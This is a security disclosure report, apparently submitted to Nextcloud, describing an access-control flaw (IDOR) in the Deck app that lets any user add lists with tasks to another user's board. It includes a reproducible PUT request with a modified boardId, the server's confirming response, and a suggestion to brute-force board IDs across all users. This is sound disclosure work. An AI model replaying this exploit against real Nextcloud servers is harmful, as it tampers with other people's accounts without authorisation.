Nextcloud: Nextcloud Deck : Possibility for anyone to add a stack with existing tasks on anyone's board

Hi everyone,

Hope you are well !

I found an IDOR vulnerability, allowing any user without privilege to add lists with tasks in any user board.
This was tested on a Nextcloud Hub II server (v23) with the Deck application in version 1.6.0.

Steps To Reproduce:

Beforehand:

• Have an A user with a board ID specific to that user (boardId parameter)
• Have a user B with a board ID specific to that user (boardId parameter)
• Note that there is no link between our user A and user B

1°) With your user A, rename an existing list belonging to him.

The following PUT request is made :

PUT /apps/deck/stacks/31 HTTP/1.1
Host: nextcloud.yourserver.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
requesttoken: <token>
Content-Length: 136
Origin: https://nextcloud.yourserver.com
Connection: close
Cookie: <your_session_cookies>

{"title":"IDOR","boardId":14,"deletedAt":0,"lastModified":1642201857,"order":0,"id":31,"ETag":"a5f7e3ab477ee2a2259f0889a63130a8"} 

Intercept the request, change the boardId parameter to that of your victim (user B) and play the modified request…

Check the server response that confirms the vulnerability:

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 14 Jan 2022 23:39:49 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 135
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Content-Security-Policy: default-src 'none';base-uri 'none';manifest-src 'self';frame-ancestors 'none'
Feature-Policy: autoplay 'none';camera 'none';fullscreen 'none';geolocation 'none';microphone 'none';payment 'none'
X-Robots-Tag: none
Referrer-Policy: no-referrer
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Strict-Transport-Security: max-age=31536000; includeSubDomains;

{"title":"IDOR_REPORT","boardId":1,"deletedAt":0,"lastModified":1642201857,"order":0,"id":31,"ETag":"a5f7e3ab477ee2a2259f0889a63130a8"}

2°) With your user B, go to the board in question and notice the addition of a new list with tasks without his knowledge

Additional Notes:

• This works from one user without privilege to another
• It works from an unprivileged user on the board of an administrator/privileged user
• If this vulnerability is exploited with a list containing several tasks, each containing images, labels, calendar etc., everything is imported to the victim’s account
• If our victim deletes the list created without his knowledge, it also deletes it on the attacker’s side

Impact

Broken Access Control - IDOR : The impact here is to be able to add lists with tasks on the board of any user and harm them.
We could imagine here brute-forcing the boardId parameter starting from 1 to 1000 (for example) to exploit this vulnerability on all the existing users/tables. We could also create on our victim an incalculable number of lists on his board.

Looking forward to exchanging.

Regards,
Supras